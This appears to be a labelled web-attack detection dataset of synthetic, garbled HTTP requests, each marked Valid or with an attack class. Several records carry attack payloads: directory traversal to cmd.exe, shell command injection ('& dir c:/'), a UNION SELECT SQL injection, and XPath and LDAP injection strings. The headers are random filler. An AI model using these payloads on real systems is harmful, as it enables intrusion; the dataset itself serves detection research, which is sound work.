GET /amrDbo2eop3ovaso/sm/r1ymklqSnDj0e.EM9/w9aeerebinozg4/nm/peenttepdtaefbiadrpA/Hfhpeo/1i1latma8Edidgo7gzlb/k2ypq-ZL/qetc57.FxLvdocument/taraasnblearf/ntEeweentgo.html?elo=ip&Z83xQpassthru=ta&RNAqXconnectqUJs1Q=dCagiAneht5ozfe&ae4=e1Icro&otppeol=tes&hrdhhr7NOq3=1009286035&eNuziIuesiuec=mngcpw&He4T6srixsst=divSaiframe&ondfn8eshu=47789&1kdXj_u=naths&homeEf@eAsystemrcpOL=189951&gtaesdbah=t+&aii=8bin+v%28erstkbinLr&-ESVTjchild0X_vQ=mi&uADKN=0926 HTTP/1.0
Host: www.et9vlK.uk
Connection: keep-alive
Accept: image/jpeg;q=0.7, audio/x-wav
Accept-Charset: *;q=0.6
Accept-Encoding: identity;q=0.8, identity, identity
Accept-Language: *;q=0.9
Cache-Control: raG='m'
Client-ip: 190.6.111.152
Cookie: f0eosBed7= g
Cookie2: $Version="803"
Date: Sat, 30 Jul 05 08:19:06 UTC
ETag: "n9tR8-lMN_crbqnE"
Expect: e7ee=osmnAs
From: lyoqimi@ail6qoo.it
If-Modified-Since: Tue, 10 May 05 10:08:30 CET
If-Unmodified-Since: Sat, 21 Aug 04 15:50:48 CET
If-Match: *
If-None-Match: "UciD0zCslT4vWbW3-"
If-Range: Sun, 06 Dec 09 01:59:35 GMT
Max-Forwards: 092
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: Basic Zm5vdWE6b3R4dHM=
Authorization: sanho wEnq=ivsdaa
Range: -0
Referer: http://zqEtlhi.cz/ocog.zip
TE: gzip,trailers,trailers
Trailer: Max-Forwards
User-Agent: sxk-seo http://www.txice.uk
UA-CPU: Sparc
UA-Disp: 7860,6624,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 6456x555
Via: HTTP/6.7 170.164.190.89, 5.4 www.n9aRxt.gif, 7.1 24.105.52.165
Transfer-Encoding: gzip
Upgrade: r7hret/3.9, mve/5.9, oiIbha/2.2, anpn/6.2, voe9h/2.5
Warning: 045 www.nInays.shtml "mnn2hK5" "Sat, 06 Dec 08 17:57:34 UTC"
X-Forwarded-For: 141.250.177.130
X-Serial-Number: 74489
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 13165
Start - Id: 3483
class: Valid
GET /odooysn4dn/53u/tOFEQi/wideEs/c50b6puxjRTTT2/NRCDEsl/Eetbcresehuu.jpeg?aioDn=h&fYKb=twstZgDDC&uc4osd4th4trec=e&U5no3AoI=60868215&hneemliwc7is5=7501295&Wtt2S9-Ixtorw=%2B8roetosad35f&7h3yhYhgE=43872&bodysCLUZ8h=09&anheotsmbs=otYMLPA&nt9iEhrslOte6e=eH1f-%3C+hte8pt%2BO8betweenfo HTTP/1.1
Host: 10.109.238.216:53129
Connection: tne2d
Accept: text/*;q=0.7, application/rtf;q=0.5
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=22160
Client-ip: 255.2.231.115
Cookie: i8niee=eycnls\ 6c;ngos=raar;A0m5teilnmu=156179;ilosute=tie
Cookie2: $Version="75"
Date: Wed, 12 Oct 05 13:20:02 CET
ETag: "sFmW0js@KSd0fL3"
Expect: 100-continue
From: peuneie@adoc.be
If-Modified-Since: Thu, 07 Dec 06 20:15:08 UTC
If-Unmodified-Since: Mon, 23 Feb 04 22:25:43 CET
If-Match: "08CgNvmoOQ.GS.W4qN"
If-None-Match: "LQkSRB.lWtBeF4Mze6"
If-Range: *
Max-Forwards: 26
MIME-Version: 6.5
Pragma: ezkdA=eote
Proxy-Authorization: Digest algorithm=MD5
Authorization: Digest qop=auth-int
Range: 2754-,-42,333635-
Referer: http://www.Ytrieuem.biz/ohdeetd/wdnai/sqolu/tbe5tt/tutxta.rar
TE: gzip,chunked;q=0.9
Trailer: User-Agent
User-Agent: Mozilla/9.9 (compatible; btsbeo; SunOS sun4u; esiwi)
UA-CPU: x86
UA-Disp: 7333,3930,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 8177x498
Via: HTTP/2.7 www.klrd.css
Transfer-Encoding: deflate
Upgrade: inonY/0.4, ntioh9/5.8, s5ir/5.7, hell/8.4, daseo/5.5
Warning: 330 47.121.195.196 "o9daseccs5doattoiw" "Sat, 18 Oct 08 15:22:02 CET"
X-Forwarded-For: 175.189.142.174
X-Serial-Number: 6688581
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 3483
Start - Id: 44287
class: OsCommanding
GET ..%%35%63../..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 68.107.86.178
Connection: close
Accept: video/*;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: lshuttah-nAadtomt, 19ntRi-assHcp;q=0.7, s-ehetv8zl;q=0.7
Cache-Control: min-fresh=44540
Client-ip: 136.184.250.5
Cookie: lEo2Ine7=rasc4;iylppgkepw=025898290;6sTiytjbonbre=4Jo9I0TJf5M;ilineertihRf=808888
Cookie2: $Version="0"
Date: Sat, 01 May 04 19:23:15 GMT
ETag: "b_1HVy3bbCtIipID7"
Expect: 100-continue
From: aEtkm@tNLeshe.uk
If-Modified-Since: Thu, 21 Dec 06 03:26:43 CET
If-Unmodified-Since: Thu, 16 Sep 04 21:53:31 CET
If-Match: "yVetv82c4EOuubLZ"
If-None-Match: "sXzhETLzaX4W4CVxSK1S"
If-Range: Mon, 08 Nov 04 16:50:31 UTC
Max-Forwards: 999
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: NTLM b1dmc2ZsdHh6cmV0d2F0dDlsYmlkYWhpc2lrcW5kYWFlOHJ1Zw==
Authorization: Basic b2VlZTpkd3I4bnM=
Range: 77-00,194-
Referer: http://ewh4n.it/slercro.asmx
TE: chunked,chunked;q=0.4,trailers
Trailer: Pragma
User-Agent: Mozilla/7.0 (Machintosh; U; Mac OS X 3.2; Rs-jl; rv:3.4.4) Gecko/64594650
UA-CPU: PowerPC
UA-Disp: 9070,4804,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 902x0631
Via: FTP/3.8 www.4iden.png:946, 4.5 www.mie3.tiff, jlawrd/1.2 www.a0eefe.css:9260
Transfer-Encoding: compress
Upgrade: coeeIl/9.2, natae/9.1, hi4/9.9, 3tu3nt/4.6, epa5c/2.6
Warning: 525 251.120.159.217 "ay2yetttoyyhQsouLs" 
X-Forwarded-For: 81.125.200.90
X-Serial-Number: 76527711
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44287
Start - Id: 48729
class: XPathInjection
GET /6DsamGau-GBJvtRp/ho/AUnh/ks8wiTrSI/zUo_ytIBXdwiMCHmoX-.sh?eoa=94904&C4QxmleIGUDuc=cVlG4D&iex2e4akjcartdl=DAslsock_streameoTe&armnSeese2boosr=taej%27%5D++++%7C+++P++%7C+%2F%2Fuser%5B+++name%2Ftext%28++%29++%3D%27hAcs HTTP/1.1
Host: www.koje.st:80
Connection: close
Accept: */*;q=0.0
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: lbn-W2Thts;q=0.3, t-ele
Cache-Control: only-if-cached
Client-ip: 86.22.3.99
Cookie: oritote425h=9PK;izTtet=nml;copya >;@IJf7-_2ZMFE=ue;divE.N=ia3pnntn2qs;nua=Nve%h =G;sRtned=etle8m
Cookie2: $Version="582"
Date: Mon, 31 Jul 06 19:51:55 UTC
ETag: "BnEpYW7keV@SK4bf"
Expect: 100-continue
From: wdlEt@aLnyEae.st
If-Modified-Since: Mon, 14 Nov 05 21:56:38 UTC
If-Unmodified-Since: Fri, 09 Apr 10 21:44:52 UTC
If-Match: "fbFshIx.4Xyty4MQ"
If-None-Match: "zfo7oCFukF4XNIM4y"
If-Range: Tue, 25 Mar 08 18:47:01 CET
Max-Forwards: 39
Pragma: gsr0ue='keo'
Proxy-Authorization: NTLM dTZld210U2hpaWhzaFNhdHVyZWRvcmNlZnBxQTNydzJlc3RyYW1o
Authorization: icannb ixryi1m=Aoh9lSu
Range: 57-668114
Referer: http://nzx6nen.st/xrbET.jpeg
TE: trailers
Trailer: Upgrade
User-Agent: xilbaiP (eY7gtA; rGpbW36)
UA-CPU: Sparc
UA-Disp: 0723,340,16
UA-OS: Windows 98
UA-Pixels: 0339x4942
Via: HTTP/8.1 www.Tpce.tiff, 9.7 www.aShah.html, 5.8 202.238.250.241
Transfer-Encoding: gzip
Upgrade: siR/5.1
Warning: 042 95.15.3.29 "ettnnbeaTz7i" "Fri, 29 Apr 05 11:16:46 UTC"
X-Serial-Number: 3865979
----: ------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 48729
Start - Id: 1672
class: Valid
GET /n6yridvlemoaRgix/b5-/7h@PanYH2TK.html?td79i=hesmTgsio5&fromofoptDBx=857&stks=92&@IDs5q1=nrtrla2OtagstozAe&osfnOeta=he HTTP/1.1
Host: 252.58.56.166
Connection: keep-alive
Accept: audio/*, application/*
Accept-Charset: x-mac-arabic;q=0.2, iso-8859-6, x-mac-icelandic;q=0.2, windows-874;q=0.9
Accept-Encoding: gzip, gzip;q=0.8, deflate;q=0.5, identity;q=0.5
Accept-Language: ejmv-w;q=0.0, bhe-Idt;q=0.9, y-5f;q=0.6, eeaasdf-dwpfK;q=0.5, ts-ftaed;q=0.3
Cache-Control: max-stale
Client-ip: 77.199.112.25
Cookie: tn=84353;Wpr3MvarAjUnL=etiH;nr4i5=6955894;ni=rq6DcjCy-;ncIlib8Mnp= h9ltelsea;Kpassthru8S.8rG=b
Cookie2: $Version="708"
Date: Sun, 19 Jun 05 09:32:18 UTC
ETag: W/"HFoUAk2B.Gad_HqbK"
Expect: 100-continue
From: pb3eit@susdyhwa7.com
If-Modified-Since: Mon, 07 Jan 08 20:20:56 GMT
If-Unmodified-Since: Wed, 25 Nov 09 17:32:37 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 19 Sep 09 08:52:44 CET
Max-Forwards: 937
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: sesl mseen0c=dlpAam
Authorization: y18pu rnjssnu=7eys2nm
Range: 73-
Referer: http://www.aescTRa.cz/stsi6.txt
TE: gzip;q=0.2,chunked;q=0.7,trailers
Trailer: If-None-Match
User-Agent: heitorbiftalrzim
UA-CPU: PowerPC
UA-Disp: 6991,2124,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 3512x868
Via: FTP/9.5 www.ayeloa.tiff, din6Tb/2.9 www.ilotosle.png
Transfer-Encoding: gzip
Upgrade: edsh/1.1, 0e3eaA/2.7, 9eisMe/2.7
Warning: 918 www.oDrh8eht.gif:495 "6reee4ateqt1g" "Tue, 13 Dec 05 16:36:28 CET"
X-Forwarded-For: 111.79.187.206
X-Serial-Number: 3355979393710804862
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1672
Start - Id: 32089
class: Valid
GET /s9iiu6sN3kbYjFtM/iGTy7hmD1011nj2NJ/oatqoebb/ese5ab1l6lh/9rxhg04hfjwtenet/iteonoe3auac/1TsZ.php?vereutuOo=sodqi3T58wN&spszGttntrac=44&ai=ser6ruatouset&ho=zG_qCvJ_dBKF&afmhrfkahjhat2=d+aa&ipnea1dil=9&vg0YEcatDWbL=etttik2pgmsUl&loujdilireuu2E=replacemhsnhhiumos%3Fn4&jL1pd=%28nrv&pitxlel=%3A%27-3&ia9=yLkwLVT&SUSMGfromh=in04bhhrttstbhttpn&M2duS=418 HTTP/1.1
Host: 118.228.208.0:0
Connection: close
Accept: */*
Accept-Charset: windows-1255;q=0.4, iso-8859-4;q=0.6, x-mac-ce;q=0.0
Accept-Encoding: 
Accept-Language: ulrcfdT-e, o-tG0e, ohea-nRoiIm, 7o0ho5-tttc;q=0.5, ipn-e;q=0.1
Cache-Control: no-store
Client-ip: 33.67.116.69
Cookie: ursjhr=218;ohw5fi6ge=7@2iw;EdeleteiiHE=5etusru;osMhchhabiepsii=604961;@documentgroup bycopyQA=c8e;1ou8gAsehasmflS=liR1ETmtgN-D
Cookie2: $Version="24"
Date: Sat, 16 Feb 08 24:18:56 CET
ETag: W/"5PV8Py1fLbmc@v.6Mq9o"
Expect: 100-continue
From: oneoaok5@sosn.com
If-Modified-Since: Wed, 04 Jun 08 19:32:48 UTC
If-Unmodified-Since: Sun, 10 May 09 03:40:10 CET
If-Match: "Ypo8_okI1B1.PcmLFQ"
If-None-Match: "HeL9IN2CJwzKyjf3"
If-Range: Wed, 08 Jun 05 11:53:43 GMT
Max-Forwards: 6842
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: Basic ZXNvbHRybzphRk9p
Authorization: Basic cmE3Yzp5YW9kbA==
Range: 409-001,9959-4327,17574-972
Referer: http://www.Ptgahadn.fr/plnene.jsp
TE: trailers
Trailer: From
User-Agent: eleotn3OaSrudllldAi
UA-CPU: MIPS
UA-Disp: 702,413,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 367x7496
Via: HTTP/3.1 www.8ieaxi4.html
Transfer-Encoding: compress
Upgrade: 7esxrt/2.4, oead/7.0, rsiaa/4.4, rte8e/6.3
Warning: 016 25.68.94.166 "waqtcrQansteysdLb" "Mon, 16 Feb 09 09:37:11 CET"
X-Forwarded-For: 15.97.140.41
X-Serial-Number: 92787527388694
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32089
Start - Id: 41995
class: SqlInjection
GET /8nhtEelotdtdwl8/nxaacjaenyeoNbays/3vdodc8tsls.html?yithethaie=9072&QsbetweenAWhCaXXp=%27++%29+UNION++ALL+++SELECT++++Sxsdi+%2C++++oude1+%2C++ep++FROM+++++sojaa++++WHERE++++oA+++++NOT+IN+%28+%27y1%27%29++++AND++++smnUsrnh++++NOT+IN+++++%28++%27arslho%27+%29+AND+++++%27%27++++%3D++++%27&tr0elt=G4ee5eu&6stctea=81158&3lemC=57985432&axaame=37856&mj_havingvposition@HF=qstqtoe4ralvtbbne&smryklcpT=029047&uOd2aS5cneUs=tmformkr&y45copyK24ah=u%40e HTTP/1.0
Host: 214.83.233.204
Connection: close
Accept: video/*;q=0.8, text/*
Accept-Charset: koi8;q=0.8, macintosh;q=0.4, euc-cn, cp-950;q=0.4, iso-8859-15
Accept-Encoding: 
Accept-Language: evw-glt, v8rethra-eub, o-6ro;q=0.7
Cache-Control: no-cache
Client-ip: 134.245.214.117
Cookie: cM7hts=zCvF;itjorcbhtinl=hKFxRblhY5y5;TNx6dTGgroup byoDC=ranOp;oneleaaoeUysetg=wTRwx-I1C;ni_aBV5@WHZE=e;dhisnessgswle=89rohb
Cookie2: $Version="419"
Date: Wed, 09 Jan 08 09:41:53 UTC
ETag: "@kad9QMXdlP@jeeYm73"
Expect: qdhiW=zajnoi;dhetiyu
From: wXro@erouh.com
If-Modified-Since: Wed, 12 Sep 07 03:44:07 GMT
If-Unmodified-Since: Sat, 30 Jan 10 01:03:29 UTC
If-Match: "TA98GTAGo2h3BA5U"
If-None-Match: "0.rygmfxAVgEQxL8B"
If-Range: *
Max-Forwards: 1
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: NTLM c2U0dUNCc2F0ZUVuNWVvZ3RhTW10aWdlbGFvZXU0bUE2YWlpYw==
Authorization: WpbNtb soaipaae=aige
Range: -728027,84041-8,736156-
Referer: http://www.r7pb.biz/tlcCntn9/wM3eet/iGu1ag.jpeg
TE: gzip,deflate,trailers
Trailer: Accept-Charset
User-Agent: 08tit9ag (tM.gT_y; icxsZsOU; gwtLfJU; u3EH_fO8Sn)
UA-CPU: StrongARM
UA-Disp: 8277,101,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 721x544
Via: 6.5 152.108.9.22:2, 2.0 221.26.68.151
Transfer-Encoding: deflate
Upgrade: tsem/9.8, icrMn/2.4
Warning: 861 www.leOkisE.js "t5dd1agosNnsneae" "Sat, 17 Apr 04 02:49:48 UTC"
X-Forwarded-For: 103.130.102.117
X-Serial-Number: 772384141
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41995
Start - Id: 43847
class: OsCommanding
GET /scripts/file.bat" & dir c:/ .exe? HTTP/1.1
Host: 67.89.173.218
Connection: keep-alive
Accept: application/*, image/gif, text/xml;q=0.3
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 85.189.85.166
Cookie: OePic0aui=dzotn;1FsK770kI4s=waoouansHm;icD9iml=tQy0-Fh;Lnull@5Bmk1netcatG=cstewetStiinph-ims;SFss2=)xaperl~dodre~Z1
Cookie2: $Version="07"
Date: Sun, 17 May 09 06:00:32 GMT
ETag: W/"nZ6Un-WUg8Ql08C.x"
Expect: 100-continue
From: nxa0tn0@Cododus.net
If-Modified-Since: Thu, 06 Nov 08 24:34:59 CET
If-Unmodified-Since: Sun, 04 Jul 04 24:36:37 CET
If-Match: "8QsYdjFUvqZ_QedTW"
If-None-Match: "oKzWEL5pjaNcyRwVY_Kb"
If-Range: Tue, 13 Mar 07 02:44:46 CET
Max-Forwards: 3
MIME-Version: 1.9
Pragma: aeriel='oyet9ss'
Proxy-Authorization: Basic bEx1ZWN0TjpudGFsZQ==
Authorization: Basic b2VUdXNldDpyMzVzOXM=
Range: 064373-124259,214-265,801-679
Referer: http://richeoa.gov/isu0ncq.dll
TE: trailers
Trailer: User-Agent
User-Agent: Mozilla/8.8 (Machintosh; U; PPC Mac OS X 3.4; RO-ug; rv:6.5.4) Gecko/96877215
UA-CPU: PowerPC
UA-Disp: 431,094,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 629x1097
Via: 1.6 www.niou.png:6
Transfer-Encoding: IaUt
Upgrade: hnohEn/1.3, he2eEw/1.1, bncL/6.8, m2jzg/1.9, jtxSa/2.3
Warning: 247 246.53.212.201 "ekzocqatldrtah" "Tue, 01 Sep 09 06:23:34 CET"
X-Forwarded-For: 69.99.5.109
X-Serial-Number: 77798884304573720348
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 43847
Start - Id: 37222
class: LdapInjection
GET /swyr363rcsbs9/eox8wu/t9qOJkIbin/a0ww9ve4sttoch/logIp_Hz/9FkJ/ew/ojYFKpb/vAD4-n2_a/eajpIYweELe44edo.js?oshnin7oIo8=uVBjV0.Z0-b&9N0GBJ-DLO=%29+++%28%7C+%28apnr%3Dhob*%29&AoiRWLH9Auq=eyn8&0u8miho=varachild HTTP/1.0
Host: 239.98.241.88:80
Connection: keep-alive
Accept: audio/*;q=0.2, application/*
Accept-Charset: hz-gb-2312;q=0.0, x-mac-cyrillic;q=0.8
Accept-Encoding: identity, deflate, gzip;q=0.7
Accept-Language: a9-n
Cache-Control: no-transform
Client-ip: 60.153.84.246
Cookie: aubaeit=htdozear;BuaHt4hla0=41
Cookie2: $Version="9"
Date: Tue, 08 Nov 05 01:17:20 GMT
ETag: W/"rZy5O4khBGnzJI7m1"
Expect: eesgne
From: soETt@snjTsesiy.ch
If-Modified-Since: Sun, 10 Aug 08 18:39:43 GMT
If-Unmodified-Since: Sun, 25 Apr 10 23:03:03 GMT
If-Match: "WUclZDkjrH9trt3mOL"
If-None-Match: *
If-Range: Tue, 25 Nov 08 04:24:37 UTC
Max-Forwards: 8
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Digest opaque="OnuSrle"
Range: -035
Referer: /wlnna.gif
TE: chunked,trailers,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/3.6 (Windows; U; Windows NT 7.8; So-ax; rv:8.3.7) Gecko/76114162
UA-CPU: Sparc
UA-Disp: 1435,7280,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 0874x8291
Via: 8.1 www.osniapu.css, nnpfg/8.0 213.147.44.108
Transfer-Encoding: deflate
Upgrade: cleeI/2.9, MCtE/0.6, Tse/6.1, rge/4.6, esEkld/2.9
Warning: 553 www.Nftmdh.html "rnvarnu59oDgV" "Mon, 31 Oct 05 08:57:55 UTC"
X-Forwarded-For: 217.7.45.94
X-Serial-Number: 973297601016037015
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37222
Start - Id: 6114
class: Valid
PUT /aXfhNwYJi9M/n@JRhWap2r/iAZX8DXexec/oeldoesd/tJvYxGuYs5S@/6DsJDLnUoFb/ZxhIi/s3uuay4O6euayaNadl/mecpahe/eaedp9htOiss.png? HTTP/1.0
Content-Length: 219
Content-Language: uO55,afDohsr
Content-Encoding: identity
Content-Location: http://www.nhuetIy.ch/ts9z/0uetuatr.gif
Content-MD5: Y2tnc2xoaXNWYXRoZWJubw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 02 Feb 06 13:02:17 CET
Last-Modified: Fri, 31 Jul 09 05:25:03 CET
Host: www.tkOikmybzc.de
Connection: keep-alive
Accept: text/*;q=0.5, image/*;q=0.7, image/gif
Accept-Charset: *
Accept-Encoding: compress;q=0.3, deflate
Accept-Language: nTrerO-et5hwm, njeRWui2-sYuIy, oocr-7sgu
Cache-Control: no-cache
Client-ip: 81.38.114.207
Cookie: I.likeG3SeXr=0;eoaeAi=tdflvzk.Mx;Tnaew4lsts=7 Adlrifoh
Cookie2: $Version="97"
Date: Wed, 25 Apr 07 14:06:45 GMT
ETag: "FjAysqu8TlLKoFWdNq"
Expect: 100-continue
From: nwqTu@iinmi.st
If-Modified-Since: Wed, 06 Oct 04 19:54:54 UTC
If-Unmodified-Since: Fri, 24 Oct 08 21:03:07 GMT
If-Match: *
If-None-Match: "p9GwTCq-H8YEvhGky"
If-Range: Wed, 13 Aug 08 22:55:02 CET
Max-Forwards: 0
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: NTLM b3hpaDV0NGV1ZWhyc3JvcGVyZW9HcmFTdG5uYUFUaXI=
Authorization: ttAiyg siadifs=zha9dI
Range: 6-86083
Referer: /h7diea/beoaul/aoeaedsj/dwqm8.aspx
TE: chunked;q=0.4,gzip;q=0.4
Trailer: Host
User-Agent: bu8b (u@OJa.)
UA-CPU: PowerPC
UA-Disp: 395,743,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 904x539
Via: 4.5 www.ser7sm.js, FTP/1.5 www.inedyiAc.css, 5.4 131.51.186.174:017
Transfer-Encoding: deflate
Upgrade: mhds/5.5, nbntm/4.8
Warning: 650 69.47.85.230 "eneld6Odeonlenmnn" "Tue, 12 Aug 08 13:16:53 CET"
X-Forwarded-For: 146.137.164.24
X-Serial-Number: 763044714398
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

iRUr9nmtl=i&Efndrophs4Eftp&enotEzasnun1=hnescx4lien&iaqneoc=987536397&Jdg6-fr0=dnsn&dBes6c0dkshe=asa8ae&@L_GrpO4home5=35330808&Aamcb=eqrayTnewedztyfso&OpsuQHM=$sao+ +agsuefdropgELdS &ynoct4iU8eheLd=~it aeteuv 

End - Id: 6114
Start - Id: 565
class: Valid
GET /stH3oleehbif/24hlgerleOvIjfuetv/73n5WI7y/xw6/1OsAntasrnbuhoeNh84s/hoiewhiIeeiaftteo/dBRinsert/45K1otSNpDiCA/rplY.asmx?reJWfWperltmpP=%2Frya8varsea+2ao HTTP/1.1
Host: www.yenaafor.uk:80
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: rsraowoo-Oiy;q=0.4, 7-iIntrrox, u8tst3d-rolioi;q=0.1, i-e;q=0.2
Cache-Control: max-age=491
Client-ip: 160.201.138.49
Cookie: cti=18774995
Cookie2: $Version="404"
Date: Sat, 04 Sep 04 08:59:32 UTC
ETag: W/"ln37JRy0Pdvd44lMwj2"
Expect: BmRn1rei=LlnY424
From: anpb@5nXz.cz
If-Modified-Since: Tue, 09 Oct 07 01:44:16 CET
If-Unmodified-Since: Thu, 18 May 06 06:22:28 GMT
If-Match: "-V8kghd_xTzratK_J0"
If-None-Match: "YpU8GOV8CiApl-ynQLRP"
If-Range: *
Max-Forwards: 9
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: Basic N2dtVGFzOjh4cnRw
Authorization: Basic SHFudGhobzo2ZXFvenM=
Range: 5753-
Referer: http://e2xOwki.de/losens.cfm
TE: trailers,trailers,trailers
Trailer: If-Range
User-Agent: Mozilla/8.7 (Machintosh; U; PPC 0.7; o7-rv; rv:6.9.3) Gecko/36123552
UA-CPU: MIPS
UA-Disp: 121,9701,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 412x961
Via: 0.1 149.100.137.243, 5.2 www.4ter5tp.css, HTTP/8.2 63.90.55.145
Transfer-Encoding: compress
Upgrade: tNs/1.9, LEdid/0.3
Warning: 107 www.ojbehoq.css "igabo" 
X-Forwarded-For: 248.12.237.242
X-Serial-Number: 602347866565729
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 565
Start - Id: 50011
class: XPathInjection
PUT /awK1jqRaryH/x0IeSnvN.Q/nUQxTZA0gFu/toO0V/bzMcK/7LTFRposition/7mR/oMq9Q2AyXZkM4CLCs/pp/iircantLilgXpas5o.html? HTTP/1.1
Content-Length: 314
Content-Language: en,asoote,o
Content-Encoding: gzip
Content-Location: /ruo7v/lejwf/ur0nnmrh/oEiib.tar
Content-MD5: aTluYWFvdXRvZXF0bWF0Mw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 19 Jul 09 20:22:30 GMT
Last-Modified: Sun, 20 Apr 08 05:35:32 UTC
Host: www.it5tfskiu.uk
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: windows-1255;q=0.1
Accept-Encoding: *
Accept-Language: ct']    |   P    |  //user[  name/text(  )    ='cRnlk
Cache-Control: only-if-cached
Client-ip: 119.180.39.9
Cookie: sle=746;etcljaanE9n=lgi4uppr3s
Cookie2: $Version="209"
Date: Thu, 28 Feb 08 20:16:47 CET
ETag: "8zDNHlzc1TiEHMJ9"
Expect: 100-continue
From: Ecil@targ.fr
If-Modified-Since: Tue, 08 Mar 05 08:24:03 GMT
If-Unmodified-Since: Sat, 20 Jun 09 01:21:54 UTC
If-Match: *
If-None-Match: "Ld45eQewneC92MZ"
If-Range: "Y5xw@QZ.lyASgcJA8"
Max-Forwards: 74
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: Digest nc=95A56604
Authorization: gm4m d2tqs=mam0s
Range: 1-0902
Referer: http://rtr5P.cz/tnmcne/ttn0/slttA6/isopntei.php
TE: trailers,trailers
Trailer: If-Match
User-Agent: qpf5oejttvtatdtNe
UA-CPU: MIPS
UA-Disp: 5539,6840,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 957x1532
Via: 6.9 192.205.223.149:6, FTP/3.3 105.239.103.166:42, 0i5D/1.9 145.181.113.198
Transfer-Encoding: compress
Upgrade: ihrzto/2.6, omrie/3.9, eairtL/8.4, nh9aUe/7.3, nbnau7/0.7
Warning: 530 www.qhehor.gif:76 "9eueIrtmcdq6tn" "Wed, 30 Jan 08 10:22:21 CET"
X-Serial-Number: 1430325
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~

uynVoluqtn=013eYieAhtof&9zGBQHHmailV6meta=Tasam&de6aioFf=limgStkr~ &lpen6=tOVgA0@_&FbeQpammeldesj=tirhhacceptesvl]a2ewindow.openan&b4=hitdrt&htaccesi4y0f&etSXuGbu1deEcN=68893&Ajlinkw=07126169&PqK3=eLp&OhiiGnppis=locationu=ydes<Aimglocationdeletes:1deA$a&oynsn=381533&niy=nEmehrtte edrop&3y=tfatj'

End - Id: 50011
Start - Id: 20153
class: Valid
GET /ilebse6xt0/tdrop.shtml?in=temejfereoo&OPGCselectL=nu+5gh&okhorv=rEdElSefbOeai&kaagraaptaa2nng=iilqr8e5stase5uw%28system&5hAhacaGsnu=%26cnullaltnesrid+oh&KwvBW.Eow=%24fth&bimjdoalsete=xrihx4&nienirhotyAaS=go HTTP/1.1
Host: www.oemxaln.org
Connection: omtsytkS
Accept: */*;q=0.5
Accept-Charset: hz-gb-2312, utf-8;q=0.3, x-mac-chinesetrad;q=0.5
Accept-Encoding: 
Accept-Language: A-iidEvtcd;q=0.7
Cache-Control: max-age=94358
Client-ip: 127.101.234.36
Cookie: oifGE=9ro Sale
Cookie2: $Version="74"
Date: Wed, 16 Nov 05 24:23:44 UTC
ETag: W/"e79xNrsSJ4l28i@mqK"
Expect: 100-continue
From: sb62@aupq5s0rh.st
If-Modified-Since: Fri, 11 Apr 08 10:13:03 GMT
If-Unmodified-Since: Sun, 30 Nov 08 01:25:20 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 25 Oct 04 20:49:59 GMT
Max-Forwards: 18
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: srrnsA krEeR=Tsg3ode
Authorization: Digest username="aodtd"
Range: 365749-,607-065
Referer: http://oa8dP2.net/rfoswesA/kswegs/rsgtif/tprTli.jsp
TE: deflate,trailers,deflate;q=0.9
Trailer: Warning
User-Agent: Mozilla/2.2 (Machintosh; U; PPC 9.0; 7t-Sa; rv:9.5.1) Gecko/56555569
UA-CPU: PowerPC
UA-Disp: 972,951,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 2245x9664
Via: HTTP/4.3 www.aeegor.gif
Transfer-Encoding: deflate
Upgrade: ttd5j/9.6, zlM/2.4, xdtc/7.0
